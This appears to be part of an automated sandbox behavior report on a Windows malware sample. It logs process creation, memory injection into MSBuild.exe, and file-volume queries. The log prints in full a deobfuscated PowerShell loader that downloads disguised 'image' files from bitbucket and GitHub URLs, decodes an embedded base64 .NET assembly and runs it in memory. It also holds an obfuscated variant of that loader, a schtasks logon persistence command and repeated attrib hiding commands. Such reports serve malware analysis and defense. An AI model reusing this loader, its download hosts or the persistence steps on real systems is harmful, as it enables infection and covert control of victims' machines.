                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 410000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EED008Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$CJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "Msbuild"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo$gu$d$$u$fm$zqby$hy$aqbj$gu$u$bv$gk$bgb0$e0$yqbu$ge$zwbl$hi$xq$6$do$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$$g$d0$i$bb$e4$zqb0$c4$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$bu$hk$c$bl$f0$og$6$fq$b$bz$de$mg$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgb1$g4$ywb0$gk$bwbu$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$b7$c$$c$bh$hi$yqbt$c$$k$bb$hm$d$by$gk$bgbn$fs$xqbd$cq$b$bp$g4$awbz$ck$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$b3$gu$ygbd$gw$aqbl$g4$d$$g$d0$i$bo$gu$dw$t$e8$ygbq$gu$ywb0$c$$uwb5$hm$d$bl$g0$lgbo$gu$d$$u$fc$zqbi$em$b$bp$gu$bgb0$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$c$$pq$g$ec$zqb0$c0$ugbh$g4$z$bv$g0$i$$t$ek$bgbw$hu$d$bp$gi$agbl$gm$d$$g$cq$b$bp$g4$awbz$c$$lqbd$g8$dqbu$hq$i$$k$gw$aqbu$gs$cw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgbv$hi$zqbh$gm$a$$g$cg$j$bs$gk$bgbr$c$$aqbu$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$ck$i$b7$c$$d$by$hk$i$b7$c$$cgbl$hq$dqby$g4$i$$k$hc$zqbi$em$b$bp$gu$bgb0$c4$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$k$$k$gw$aqbu$gs$kq$g$h0$i$bj$ge$d$bj$gg$i$b7$c$$ywbv$g4$d$bp$g4$dqbl$c$$fq$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$by$gu$d$b1$hi$bg$g$cq$bgb1$gw$b$$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gw$aqbu$gs$cw$g$d0$i$b$$cg$jwbo$hq$d$bw$hm$og$v$c8$ygbp$hq$ygb1$gm$awbl$hq$lgbv$hi$zw$v$gc$a$bq$gs$awbr$gs$awbr$gs$aw$v$hq$z$by$gq$cgbl$gu$cwb0$c8$z$bv$hc$bgbs$g8$yqbk$hm$lwbp$g0$zw$u$go$c$bn$d8$nq$z$dc$ng$x$di$jw$s$c$$jwbo$hq$d$bw$hm$og$v$c8$cgbh$hc$lgbn$gk$d$bo$hu$ygb1$hm$zqby$gm$bwbu$hq$zqbu$hq$lgbj$g8$bq$v$gc$bqbl$gq$dqbz$ge$mq$z$du$lwbu$ge$bgbv$c8$cgbl$gy$cw$v$gg$zqbh$gq$cw$v$g0$yqbp$g4$lwbu$gu$dwbf$gk$bqbn$de$mg$z$c4$agbw$gc$jw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bp$g0$yqbn$gu$qgb5$hq$zqbz$c$$pq$g$eq$bwb3$g4$b$bv$ge$z$be$ge$d$bh$ey$cgbv$g0$t$bp$g4$awbz$c$$j$bs$gk$bgbr$hm$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$bp$gy$i$$o$cq$aqbt$ge$zwbl$ei$eqb0$gu$cw$g$c0$bgbl$c$$j$bu$hu$b$bs$ck$i$b7$c$$j$bp$g0$yqbn$gu$v$bl$hg$d$$g$d0$i$bb$fm$eqbz$hq$zqbt$c4$v$bl$hg$d$$u$eu$bgbj$g8$z$bp$g4$zwbd$do$ogbv$fq$rg$4$c4$rwbl$hq$uwb0$hi$aqbu$gc$k$$k$gk$bqbh$gc$zqbc$hk$d$bl$hm$kq$7$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$cq$cwb0$ge$cgb0$ey$b$bh$gc$i$$9$c$$jw$8$dw$qgbb$fm$rq$2$dq$xwbt$fq$qqbs$fq$pg$+$cc$ow$g$cq$zqbu$gq$rgbs$ge$zw$g$d0$i$$n$dw$p$bc$ee$uwbf$dy$n$bf$eu$tgbe$d4$pg$n$ds$i$$k$hm$d$bh$hi$d$bj$g4$z$bl$hg$i$$9$c$$j$bp$g0$yqbn$gu$v$bl$hg$d$$u$ek$bgbk$gu$e$bp$gy$k$$k$hm$d$bh$hi$d$bg$gw$yqbn$ck$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$d0$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c4$sqbu$gq$zqb4$e8$zg$o$cq$zqbu$gq$rgbs$ge$zw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$aqbm$c$$k$$k$hm$d$bh$hi$d$bj$g4$z$bl$hg$i$$t$gc$zq$g$d$$i$$t$ge$bgbk$c$$j$bl$g4$z$bj$g4$z$bl$hg$i$$t$gc$d$$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$p$c$$ew$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$cs$pq$g$cq$cwb0$ge$cgb0$ey$b$bh$gc$lgbm$gu$bgbn$hq$a$$7$c$$dq$k$c
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo$gu$d$$u$fm$zqby$hy$aqbj$gu$u$bv$gk$bgb0$e0$yqbu$ge$zwbl$hi$xq$6$do$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$$g$d0$i$bb$e4$zqb0$c4$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$bu$hk$c$bl$f0$og$6$fq$b$bz$de$mg$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgb1$g4$ywb0$gk$bwbu$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$b7$c$$c$bh$hi$yqbt$c$$k$bb$hm$d$by$gk$bgbn$fs$xqbd$cq$b$bp$g4$awbz$ck$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$b3$gu$ygbd$gw$aqbl$g4$d$$g$d0$i$bo$gu$dw$t$e8$ygbq$gu$ywb0$c$$uwb5$hm$d$bl$g0$lgbo$gu$d$$u$fc$zqbi$em$b$bp$gu$bgb0$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$c$$pq$g$ec$zqb0$c0$ugbh$g4$z$bv$g0$i$$t$ek$bgbw$hu$d$bp$gi$agbl$gm$d$$g$cq$b$bp$g4$awbz$c$$lqbd$g8$dqbu$hq$i$$k$gw$aqbu$gs$cw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgbv$hi$zqbh$gm$a$$g$cg$j$bs$gk$bgbr$c$$aqbu$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$ck$i$b7$c$$d$by$hk$i$b7$c$$cgbl$hq$dqby$g4$i$$k$hc$zqbi$em$b$bp$gu$bgb0$c4$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$k$$k$gw$aqbu$gs$kq$g$h0$i$bj$ge$d$bj$gg$i$b7$c$$ywbv$g4$d$bp$g4$dqbl$c$$fq$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$by$gu$d$b1$hi$bg$g$cq$bgb1$gw$b$$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gw$aqbu$gs$cw$g$d0$i$b$$cg$jwbo$hq$d$bw$hm$og$v$c8$ygbp$hq$ygb1$gm$awbl$hq$lgbv$hi$zw$v$gc$a$bq$gs$awbr$gs$awbr$gs$aw$v$hq$z$by$gq$cgbl$gu$cwb0$c8$z$bv$hc$bgbs$g8$yqbk$hm$lwbp$g0$zw$u$go$c$bn$d8$nq$z$dc$ng$x$di$jw$s$c$$jwbo$hq$d$bw$hm$og$v$c8$cgbh$hc$lgbn$gk$d$bo$hu$ygb1$hm$zqby$gm$bwbu$hq$zqbu$hq$lgbj$g8$bq$v$gc$bqbl$gq$dqbz$ge$mq$z$du$lwbu$ge$bgbv$c8$cgbl$gy$cw$v$gg$zqbh$gq$cw$v$g0$yqbp$g4$lwbu$gu$dwbf$gk$bqbn$de$mg$z$c4$agbw$gc$jw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bp$g0$yqbn$gu$qgb5$hq$zqbz$c$$pq$g$eq$bwb3$g4$b$bv$ge$z$be$ge$d$bh$ey$cgbv$g0$t$bp$g4$awbz$c$$j$bs$gk$bgbr$hm$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$bp$gy$i$$o$cq$aqbt$ge$zwbl$ei$eqb0$gu$cw$g$c0$bgbl$c$$j$bu$hu$b$bs$ck$i$b7$c$$j$bp$g0$yqbn$gu$v$bl$hg$d$$g$d0$i$bb$fm$eqbz$hq$zqbt$c4$v$bl$hg$d$$u$eu$bgbj$g8$z$bp$g4$zwbd$do$ogbv$fq$rg$4$c4$rwbl$hq$uwb0$hi$aqbu$gc$k$$k$gk$bqbh$gc$zqbc$hk$d$bl$hm$kq$7$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$cq$cwb0$ge$cgb0$ey$b$bh$gc$i$$9$c$$jw$8$dw$qgbb$fm$rq$2$dq$xwbt$fq$qqbs$fq$pg$+$cc$ow$g$cq$zqbu$gq$rgbs$ge$zw$g$d0$i$$n$dw$p$bc$ee$uwbf$dy$n$bf$eu$tgbe$d4$pg$n$ds$i$$k$hm$d$bh$hi$d$bj$g4$z$bl$hg$i$$9$c$$j$bp$g0$yqbn$gu$v$bl$hg$d$$u$ek$bgbk$gu$e$bp$gy$k$$k$hm$d$bh$hi$d$bg$gw$yqbn$ck$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$d0$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c4$sqbu$gq$zqb4$e8$zg$o$cq$zqbu$gq$rgbs$ge$zw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$aqbm$c$$k$$k$hm$d$bh$hi$d$bj$g4$z$bl$hg$i$$t$gc$zq$g$d$$i$$t$ge$bgbk$c$$j$bl$g4$z$bj$g4$z$bl$hg$i$$t$gc$d$$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$p$c$$ew$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$cs$pq$g$cq$cwb0$ge$cgb0$ey$b$bh$gc$lgbm$gu$bgbn$hq$a$$7$c$$dq$k$cJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F711CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF761F711CC
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
